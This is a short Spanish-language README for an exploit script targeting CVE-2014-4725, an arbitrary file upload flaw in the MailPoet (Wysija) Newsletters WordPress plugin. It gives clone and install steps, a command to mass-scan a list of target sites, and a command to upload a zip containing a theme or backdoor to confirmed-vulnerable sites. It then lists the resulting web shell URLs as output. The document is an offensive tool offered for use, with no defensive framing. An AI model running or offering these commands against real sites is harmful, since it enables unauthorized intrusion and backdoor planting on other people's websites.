
MailPoet Newsletters <= Subida Arbitraria de Archivos (explotador)
Este script se utiliza para escanear y explotar la vulnerabilidad CVE-2014-4725 (MailPoet/Wysija Newsletters) en WordPress.
git clone https://github.com/username/CVE-2014-4725.git
cd CVE-2014-4725
pip install requests
Escanear objetivos
python exploit.py --scan targets.txt
targets.txt contiene una lista de objetivos (uno por línea, sin http://)
Explotar objetivos
python exploit.py --exploit vuln.txt --payload file/zip.zip
vuln.txt contiene objetivos que ya se ha confirmado son vulnerables
--payload es el archivo zip que contiene el tema/backdoor a subir
Salida
vuln.txt > lista de objetivos vulnerables
shell.txt > URLs de shells subidas